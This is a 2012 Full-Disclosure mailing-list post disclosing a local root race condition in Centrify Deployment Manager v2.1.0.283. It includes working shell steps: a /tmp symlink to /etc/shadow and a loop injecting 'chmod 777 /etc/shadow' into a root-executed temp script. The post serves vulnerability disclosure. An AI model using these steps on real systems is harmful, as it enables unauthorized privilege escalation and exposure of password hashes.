[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] Centrify Deployment Manager v2.1.0.283 local root



<html><body><div><h2>Centrify Deployment Manager v2.1.0.283 local root
    </h2>
    <hr size="2" width="100%">12/7/2012<br>
    <p>Taking a little longer look at the software, I managed to win a
      race condition
      and get root with files in /tmp. Here is my analysis:
    </p>
    <p>root@h0g:/tmp<strong> ls -l /etc/shadow<br>
        -r-------- 1 root shadow 1010 Dec 7 21:42 /etc/shadow
        root@h0g:/tmp</strong> </p>
    <p>larry@h0g:/tmp$ ln -s /etc/shadow centrify.cmd.0 larry@h0g:/tmp$
      ls -l<br>
      total 24<br>
      lrwxrwxrwx 1 larry larry 11 Dec 7 21:48 centrify.cmd.0 -&gt;
      /etc/shadow
      After Analyze/Refresh Computer Information is run :
    </p>
    <p>root@h0g:/tmp<strong> ls -l /etc/shadow<br>
        -rwxr-xr-x 1 root shadow 165 Dec 7 21:48 /etc/shadow
        root@h0g:/tmp</strong> cat /etc/shadow<br>
      echo 144d823c-9c22-4d21-8446-4e2d07556177
      vmware -v 2&gt; /dev/null |grep 'VMware ESX Server' &gt;/dev/null
      temp=$?<br>
      echo af43ab93-cfce-485e-b16f-0d4331e0e421
      exit ${temp}<br>
      root@h0g:/tmp<strong> ls -l /etc/shadow<br>
        -rwxr-xr-x 1 root shadow 165 Dec 7 21:48 /etc/shadow
        root@h0g:/tmp</strong> </p>
    <p>This sucks we clobber the contents of /etc/shadow and we don't
      have write permission. <br>
    </p>
    <p>
      <b>No root still.
      </b></p>
    <p>Looking at the history and trace of what was run on the target
      system we see this:
    </p>
    <pre>Execute echo "echo 8c8ac888-342b-461f-a0ab-659251f3d602" &gt; 
/tmp/centrify.cmd.0 Result =0 <font color="#3366ff"><b>&lt;----- if we create 
the file before them, we own it.  We can write to it before it's executed and 
have our command executed.</b></font>
</pre>
    <pre>Execute echo "vmware -v 2&gt; /dev/null |grep 'VMware ESX Server' 
&gt;/dev/null" &gt;&gt; /tmp/centrify.cmd.0 Result =0
Execute echo "temp=\$?" &gt;&gt; /tmp/centrify.cmd.0 Result =0
Execute echo "echo b2449bef-65c1-45e8-9da0-4801200c5c05" &gt;&gt; 
/tmp/centrify.cmd.0 Result =0
Execute echo "exit \${temp}" &gt;&gt; /tmp/centrify.cmd.0 Result =0
Execute chmod 755 /tmp/centrify.cmd.0 Result =0 
Execute dzdo -p "Password:" sh -c "/tmp/centrify.cmd.0" Result =0 <font 
color="#3366ff"><b>&lt;--- dzdo is centrify's sudo equivalent, it's part of the 
centrify suite.</b></font>
8c8ac888-342b-461f-a0ab-659251f3d602
b2449bef-65c1-45e8-9da0-4801200c5c05
Execute rm -rf /tmp/centrify.cmd.0 Result =0
Execute id -u Result =0
</pre>
    <p>So our quick dirty exploit:
    </p>
    <p>larry@h0g:/tmp$ while (true) ; do echo "chmod 777 /etc/shadow"
      &gt;&gt; /tmp/centrify.cmd.0 ; done
    </p>
    <p>Will get us our command executed:
    </p>
    <p>larry@h0g:/tmp$ ls -l /etc/shadow<br>
      <b>-rwxrwxrwx 1 root shadow 1010 Dec 7 21:57 /etc/shadow
        larry@h0g:/tmp$ </b></p>
    <p>It might work creating the file centrify.cmd.UID, then monitoring
      it for having the execute bit set with inotify (IN_ATTRIB). When
      the execute bit is set write our malicious command to the file as
      it about to be executed by root. <br></p><p>Hopefully Kayne won't smash 
my fingers with a hammer.&nbsp; ;-)<br></p>
    <p>Larry W. Cashdollar<br>
      <a href="http://vapid.dhs.org";>http://vapid.dhs.org</a><br>
      @_larry0</p></div></body></html>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/